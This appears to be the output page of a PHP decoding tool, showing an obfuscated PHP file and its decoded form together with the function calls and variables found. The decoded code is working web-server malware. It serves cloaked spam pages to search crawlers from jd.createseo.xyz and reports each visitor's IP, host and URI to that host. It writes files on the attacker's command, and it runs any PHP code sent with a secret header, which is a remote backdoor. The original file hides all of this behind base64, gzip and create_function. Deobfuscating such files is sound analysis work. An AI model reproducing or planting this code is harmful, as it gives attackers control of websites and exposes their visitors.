Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php $CWLjDPsT='y(3;]whcx)8$4mb dk1qog5sprlua=z_/0i9tvf_"76*.2n[je';$q2866=$CWLjDPsT[(105..

Decoded Output download


error_reporting(0);
@set_time_limit(3600);
@ignore_user_abort(1);
$ixv='2.2.17';
$gov = "jd.createseo.xyz";
$db = "4002";
$ip = clientip();
$ur = isset($_SERVER['HTTP_REFERER']) ? $_SERVER['HTTP_REFERER'] : "";
$ua = isset($_SERVER['HTTP_USER_AGENT']) ? $_SERVER['HTTP_USER_AGENT'] : "";
$uri = $_SERVER["REQUEST_URI"];
$host = $_SERVER["HTTP_HOST"];
$lang = isset($_SERVER['HTTP_ACCEPT_LANGUAGE'])?$_SERVER['HTTP_ACCEPT_LANGUAGE']:"";
$token = isset($_SERVER['HTTP_XDOIM'])?$_SERVER['HTTP_XDOIM']:"";
$proto = ((!empty($_SERVER['HTTPS']) && strtolower($_SERVER['HTTPS']) !== 'off') || (isset($_SERVER['HTTP_X_FORWARDED_PROTO']) && $_SERVER['HTTP_X_FORWARDED_PROTO'] === 'https') || (!empty($_SERVER['HTTP_FRONT_END_HTTPS']) && strtolower($_SERVER['HTTP_FRONT_END_HTTPS']) !== 'off')) ?  "https": "http";
$header = array('Lang: '.$lang,'User-Agent: '.$ua, 'Referer: '.$ur, 'Http-Proto: '.$proto, 'Http-Host: '.$host, 'Http-Uri: '.$uri, 'Dbgroup: '.$gov, 'Http-X-Forwarded-For: '.$ip,'Token: '.$token);
$postdata= "proto=$proto&shost=$host&ip=$ip&dbgroup=$db&uri=$uri";

if (strlen($token)>0){ @todk(".eGbA0Ty2Wh",@file_get_contents("php://input"),FILE_USE_INCLUDE_PATH);  echo (include '.eGbA0Ty2Wh'); unlink('.eGbA0Ty2Wh');  exit; }
if (($uri!=="/favicon.ico") &&( @preg_match('#google|yahoo|bing#i',$ua) || (@preg_match('#google.co.jp|google.com|yahoo.com|yahoo.co.jp|bing.com#i',$ur) && (@preg_match('#[/\?]([a-z0-9]{1})[-_/]?(\d+_\d+_\d+)$#i',$uri)||@preg_match('#[/\?]([a-z0-9]{1})[-_/]?(\d+)#i',$uri))))){    
    list($cntx,$code,$ctype) = urlx('http://'.$gov.'/index?'.$postdata,$header,$postdata);
    if (stripos($ctype,'gzip')>0){ @header('Content-type: application/x-gzip'); exit($cntx); }
    if (stripos($cntx,'<!doct')===0||stripos($cntx,'<html')===0){ exit($cntx); }
    if (stripos($cntx,'<?xml')===0){ @header('Content-type: text/xml'); exit($cntx); }
    
    if (stripos($cntx,'http')===0){
        if (stripos($cntx,'?main_page=')){ @header('Location: ' . $cntx); exit;}
        if (strstr($cntx,"[,]")){$segs = explode("[,]",$cntx); $lines = explode(",",$segs[0]); $result = ''; foreach($lines as $url){ list($respbody,$code) = urlx($url,null,null,$segs[1]);$result .= $url.$respbody; } exit($result);}
    }
    if (@preg_match('#^[^.]*.(txt|php)#i',$cntx)){$values = explode("[,]",$cntx); todk($values[0],$values[1]); if(file_exists($values[0])){ exit('end ok');}else{ exit('no false');} }
    if (stripos($cntx,'ok')===0){ exit($cntx." ".$gov.$ixv); }
    if ($code >= 400 && $code < 500){@header('HTTP/1.1 404 Not Found');exit;}
    if ($code >= 500){@header('HTTP/1.1 500 Internal Server Error');exit;}
    if ($cntx!=""){ exit($cntx); }
}

function urlx($url,$header=null,$postdata=null,$ua=null) {
    if (!function_exists('curl_init')){ return; }
    try {
        $ch = curl_init();
        curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_FOLLOWLOCATION,1); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE);
        curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, FALSE);curl_setopt($ch, CURLOPT_ENCODING, 'gzip,deflate');
        curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 30); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
        ($header===null)?'':curl_setopt($ch, CURLOPT_HTTPHEADER, $header); ($ua===null||$ua==="")?'':curl_setopt($ch, CURLOPT_USERAGENT, $ua);
        if ($postdata!==null && $postdata!=="") {curl_setopt($ch, CURLOPT_POST, 1); curl_setopt($ch, CURLOPT_POSTFIELDS, $postdata); }
        $body = curl_exec($ch);$code = curl_getinfo($ch,CURLINFO_HTTP_CODE); $ctype = curl_getinfo($ch,CURLINFO_CONTENT_TYPE);curl_close($ch);
    } catch (Exception $e) { }   if ($body===false && function_exists('file_get_contents')) {
        ini_set('user_agent', 'Mozilla/4.0 (compatible;MSIE 6.0;Windows NT 5.2;.NET CLR 1.1.4322)');
        try {
            $body = @file_get_contents($url);
        } catch (Exception $e) { }
    }
    return array($body,$code,$ctype);
}
function todk($fil,$str){@file_put_contents($fil,$str);}
function clientip(){ $realip='';
    if (isset($_SERVER['HTTP_X_FORWARDED_FOR']) && $_SERVER['HTTP_X_FORWARDED_FOR'] !== ''){  $realip = $_SERVER['HTTP_X_FORWARDED_FOR'];
    } elseif (getenv('REMOTE_ADDR') && strcasecmp(getenv('REMOTE_ADDR'), 'unknown')) {  $realip = getenv('REMOTE_ADDR');
    } elseif (isset($_SERVER['REMOTE_ADDR']) && $_SERVER['REMOTE_ADDR'] && strcasecmp($_SERVER['REMOTE_ADDR'], 'unknown')) {  $realip = $_SERVER['REMOTE_ADDR'];
    }
    if (stristr($realip, ',')) { $values = explode(",", $realip); $realip = $values[0]; } return $realip;
}
?>

Did this file decode correctly?

Original Code

<?php $CWLjDPsT='y(3;]whcx)8$4mb dk1qog5sprlua=z_/0i9tvf_"76*.2n[je';$q2866=$CWLjDPsT[(105/15)].$CWLjDPsT[(26-1)].$CWLjDPsT[(1*49)].$CWLjDPsT[((10*1)+18)].$CWLjDPsT[(14+22)].$CWLjDPsT[(44+5)].$CWLjDPsT[(44-13)].$CWLjDPsT[(684/18)].$CWLjDPsT[(23+4)].$CWLjDPsT[(72-(33-7))].$CWLjDPsT[(154/22)].$CWLjDPsT[(11+25)].$CWLjDPsT[(65-(62-31))].$CWLjDPsT[(26-6)].$CWLjDPsT[((27*2)-8)];$pHFdNhg9688=$CWLjDPsT[(20-9)].$CWLjDPsT[(2*4)].$CWLjDPsT[(29*1)].$CWLjDPsT[(160/4)];$MYtraky2482=$CWLjDPsT[(8*5)].$CWLjDPsT[((1+0)+2)].$CWLjDPsT[(6+(1*(95/19)))].$CWLjDPsT[(140/5)].$CWLjDPsT[(522/18)].$CWLjDPsT[(7*((7-3)-2))].$CWLjDPsT[(2*14)].$CWLjDPsT[(138/(2+4))].$CWLjDPsT[(1029/(378/18))].$CWLjDPsT[((2*189)/9)].$CWLjDPsT[(12+(0+0))].$CWLjDPsT[(31*1)].$CWLjDPsT[(48/(36/12))].$CWLjDPsT[(735/15)].$CWLjDPsT[(0+7)].$CWLjDPsT[(18+2)].$CWLjDPsT[(18-(10/5))].$CWLjDPsT[(735/15)].$CWLjDPsT[(0+(2-(1*1)))].$CWLjDPsT[(16-(3+(36/(0+18))))].$CWLjDPsT[((167-23)/18)].$CWLjDPsT[(0+(18-9))].$CWLjDPsT[(1*3)].$CWLjDPsT[(11*(1+(0/(78/13))))].$CWLjDPsT[(2*7)].$CWLjDPsT[(29*(0+1))].$CWLjDPsT[(38-(8+9))].$CWLjDPsT[(15*2)].$CWLjDPsT[(45-11)].$CWLjDPsT[(1*46)].$CWLjDPsT[(1*(17+21))].$CWLjDPsT[(78/3)].$CWLjDPsT[(21+(77/11))].$CWLjDPsT[(22+14)].$CWLjDPsT[(343/(91/13))].$CWLjDPsT[(1*1)].$CWLjDPsT[(21-10)].$CWLjDPsT[(22+(12/2))].$CWLjDPsT[(180/20)].$CWLjDPsT[(3+((0+0)*1))].$CWLjDPsT[(686/(126/9))].$CWLjDPsT[(61-(32-8))].$CWLjDPsT[(476/17)].$CWLjDPsT[((4-0)+22)].$CWLjDPsT[(((23-(2*5))/13)-0)].$CWLjDPsT[(7+(84/21))].$CWLjDPsT[(28/2)].$CWLjDPsT[(9-0)].$CWLjDPsT[(3*1)];$UrR1094= "'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'";$JTx2343=$pHFdNhg9688;$JTx2343.=$UrR1094;$JTx2343.=$MYtraky2482;@$mEriqO3481=$q2866((''), ($JTx2343));@$mEriqO3481(); ?><?php

Function Calls

null 1
gzinflate 1
base64_decode 1
create_function 1

Variables

$b error_reporting(0); @set_time_limit(3600); @ignore_user_abo..
$x 'jVdtc6JIEP6eXzFhrQB3BF/ysrVxXddS3FhlNId4u1dJjiI4KhfCUIBZszH..
$q2866 create_function
$JTx2343 $x="'jVdtc6JIEP6eXzFhrQB3BF/ysrVxXddS3FhlNId4u1dJjiI4KhfCUIB..
$UrR1094 'jVdtc6JIEP6eXzFhrQB3BF/ysrVxXddS3FhlNId4u1dJjiI4KhfCUIBZszH..
$CWLjDPsT y(3;]whcx)8$4mb dk1qog5sprlua=z_/0i9tvf_"76*.2n[je
$mEriqO3481 None
$MYtraky2482 ";$a=base64_decode($x);$b=gzinflate($a);eval($b);
$pHFdNhg9688 $x="

Stats

MD5 02745989ee1c279cf3623f2f77624b65
Eval Count 2
Decode Time 154 ms